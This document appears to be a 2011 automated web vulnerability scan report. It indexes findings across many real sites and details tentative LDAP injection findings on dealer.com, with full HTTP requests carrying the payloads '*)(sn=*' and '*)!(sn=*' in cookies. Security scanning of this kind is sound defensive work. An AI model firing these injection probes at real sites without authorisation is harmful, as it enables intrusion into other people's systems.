4.302. http://shop.ca.com/applications/email/d_subscribe.asp [__utmb cookie]

4.303. http://shop.ca.com/applications/email/d_subscribe.asp [__utmc cookie]

4.304. http://shop.ca.com/applications/email/d_subscribe.asp [__utmz cookie]

4.305. http://shop.ca.com/applications/email/d_subscribe.asp [_clogin cookie]

4.306. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Cart cookie]

4.307. http://shop.ca.com/cgi-bin/ShoppingCart.asp [CoreID6 cookie]

4.308. http://shop.ca.com/cgi-bin/ShoppingCart.asp [DB cookie]

4.309. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_GSV cookie]

4.310. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_History cookie]

4.311. http://shop.ca.com/cgi-bin/ShoppingCart.asp [SessionId cookie]

4.312. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utma cookie]

4.313. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmb cookie]

4.314. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmc cookie]

4.315. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmz cookie]

4.316. http://shop.ca.com/cgi-bin/ShoppingCart.asp [_clogin cookie]

4.317. http://shop.ca.com/cgi-bin/order.asp [Cart cookie]

4.318. http://shop.ca.com/cgi-bin/order.asp [CoreID6 cookie]

4.319. http://shop.ca.com/cgi-bin/order.asp [DB cookie]

4.320. http://shop.ca.com/cgi-bin/order.asp [IS3_GSV cookie]

4.321. http://shop.ca.com/cgi-bin/order.asp [IS3_History cookie]

4.322. http://shop.ca.com/cgi-bin/order.asp [SessionId cookie]

4.323. http://shop.ca.com/cgi-bin/order.asp [__utma cookie]

4.324. http://shop.ca.com/cgi-bin/order.asp [__utmb cookie]

4.325. http://shop.ca.com/cgi-bin/order.asp [__utmc cookie]

4.326. http://shop.ca.com/cgi-bin/order.asp [__utmz cookie]

4.327. http://shop.ca.com/cgi-bin/order.asp [_clogin cookie]

5. Flash cross-domain policy

5.1. http://cspix.media6degrees.com/crossdomain.xml

5.2. http://images.dealer.com/crossdomain.xml

5.3. http://pictures.dealer.com/crossdomain.xml

5.4. http://pixel.33across.com/crossdomain.xml

5.5. http://static.dealer.com/crossdomain.xml

5.6. http://videos.dealer.com/crossdomain.xml

5.7. http://videos2.dealer.com/crossdomain.xml

5.8. http://mt0.google.com/crossdomain.xml

6. Silverlight cross-domain policy

7. Cleartext submission of password

7.1. http://community.martindale.com/groups/groupdirectory.aspx

7.2. http://community.martindale.com/upgrade-your-connected-account.aspx

7.3. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

7.4. http://www.100zakladok.ru/save/

7.5. http://www.2linkme.com/

7.6. http://www.adifni.com/account/bookmark/

7.7. http://www.adifni.com/account/bookmark/

7.8. http://www.arto.com/section/user/login/

7.9. http://www.auditmypc.com/firewall-test.asp

7.10. http://www.bookmark.it/bookmark.php

7.11. http://www.bookmark.it/bookmark.php

7.12. http://www.bookmerken.de/

7.13. http://www.brainify.com/Bookmark.aspx

7.14. http://www.cirip.ro/post/

7.15. http://www.classicalplace.com/

7.16. http://www.colivia.de/login.php

7.17. http://www.colivia.de/submit.php

7.18. http://www.diglog.com/submit.aspx

7.19. http://www.drimio.com/drimthis/index

7.20. http://www.embarkons.com/sharer.php

7.21. http://www.embarkons.com/sharer.php

7.22. http://www.embarkons.com/sharer.php/a

7.23. http://www.embarkons.com/sharer.php/a

7.24. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.25. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.26. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.27. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.28. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.29. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.30. http://www.embarkons.com/sharer.php/images/search-con.gif

7.31. http://www.embarkons.com/sharer.php/images/search-con.gif

7.32. http://www.embarkons.com/sharer.php/src/captcha.php

7.33. http://www.embarkons.com/sharer.php/src/captcha.php

7.34. http://www.ezyspot.com/submit

7.35. http://www.forceindya.com/submit

7.36. http://www.fulbright.com/

7.37. http://www.fulbright.com/index.cfm

7.38. http://www.fulbright.com/insite

7.39. http://www.fulbright.com/insite

7.40. http://www.gabbr.com/login/

7.41. http://www.gabbr.com/submit/

7.42. http://www.gamekicker.com/node/add/drigg

7.43. http://www.imera.com.br/post_d.html

7.44. http://www.influx.com.br/

7.45. http://www.jamespot.com/

7.46. http://www.jumptags.com/add/

7.47. http://www.librerio.com/inbox

7.48. http://www.linkagogo.com/go/AddNoPopup

7.49. http://www.livejournal.com/update.bml

7.50. http://www.longislanderotic.com/longislanderotic/forum/

7.51. http://www.longislanderotic.com/longislanderotic/forum/default.asp

7.52. http://www.longislanderotic.com/longislanderotic/forum/insufficient_permission.asp

7.53. http://www.longislanderotic.com/longislanderotic/forum/login_user.asp

7.54. http://www.martindale.com/ContactUs.aspx

7.55. http://www.martindale.com/all/c-england/all-lawyers-1.htm

7.56. http://www.martindale.com/all/c-england/all-lawyers-10.htm

7.57. http://www.martindale.com/all/c-england/all-lawyers-11.htm

7.58. http://www.martindale.com/all/c-england/all-lawyers-2.htm

7.59. http://www.martindale.com/all/c-england/all-lawyers-3.htm

7.60. http://www.martindale.com/all/c-england/all-lawyers-4.htm

7.61. http://www.martindale.com/all/c-england/all-lawyers-5.htm

7.62. http://www.martindale.com/all/c-england/all-lawyers-6.htm

7.63. http://www.martindale.com/all/c-england/all-lawyers-7.htm

7.64. http://www.martindale.com/all/c-england/all-lawyers-8.htm

7.65. http://www.martindale.com/all/c-england/all-lawyers-9.htm

7.66. http://www.martindale.com/all/c-england/all-lawyers.htm

7.67. http://www.phelpsdunbar.com/firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

7.68. http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

7.69. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html

7.70. http://www.phelpsdunbar.com/pages/register_newsletters/index.html

8. SSL cookie without secure flag set

8.1. https://auctions.godaddy.com/

8.2. https://cc.dealer.com/views/login

8.3. https://community.qualys.com/docs/DOC-1542

8.4. https://email.phelps.com/exchweb/bin/auth/owaauth.dll

8.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

8.6. https://home.mcafee.com/secure/cart/

8.7. https://home3.ca.com/Login2.aspx

8.8. https://myaccount.bitdefender.com/site/MyAccount/login/

8.9. https://secure.eset.com/us/store/geoIpRedirect

8.10. https://secure.opinionlab.com/ccc01/comment_card.asp

8.11. https://www.box.net/api/1.0/import

8.12. https://www.fathomseo.com/

8.13. https://www.godaddy.com/domains/popups/icannfee.aspx

8.14. https://www.trendsecure.com/my_account/signin/login

8.15. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

8.16. https://cc.dealer.com/views/forgot-password

8.17. https://cc.dealer.com/views/login

8.18. https://www.godaddy.com/gdshop/registrar/search.asp

8.19. https://www.mcafeesecure.com/RatingVerify

8.20. https://www.paypal.com/cgi-bin/webscr

9. Session token in URL

9.1. http://aolproductcentral.aol.com/ClickBroker

9.2. https://aolproductcentral.aol.com/control/additem

9.3. http://bh.contextweb.com/bh/set.aspx

9.4. http://cc.dealer.com/views/login

9.5. http://cc.dealer.com/views/login

9.6. https://cc.dealer.com/views/login

9.7. http://fls.doubleclick.net/activityi

9.8. http://l.sharethis.com/pview

9.9. http://mbox9e.offermatica.com/m2/eset/mbox/standard

9.10. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

9.11. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard

9.12. http://www.amazon.com/gp/product/0975264001

9.13. http://www.dzone.com/links/add.html

9.14. http://www.facebook.com/extern/login_status.php

9.15. http://www.hldataprotection.com/

9.16. http://www.pages05.net/WTS/event.jpeg

9.17. http://www.webroot.com/En_US/about-press-room-in-the-news.html

10. ASP.NET ViewState without MAC enabled


1. LDAP injection  next
There are 12 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

1.1. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19816
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003257; expires=Mon, 16-Apr-2012 01:20:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertisin
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)!(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20064
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003258; expires=Mon, 16-Apr-2012 01:20:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mar
...[SNIP]...
1.2. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.

The payloads b330b37b000bf702)(sn=* and b330b37b000bf702)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20004
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:58 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/
Set-Cookie: exp_last_activity=1303003678; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtil
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)!(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20158
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:00 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%21%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/
Set-Cookie: exp_last_activity=1303003679; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
...[SNIP]...
1.3. http://www.dealer.com/products/inventory-marketing/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/inventory-marketing/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; 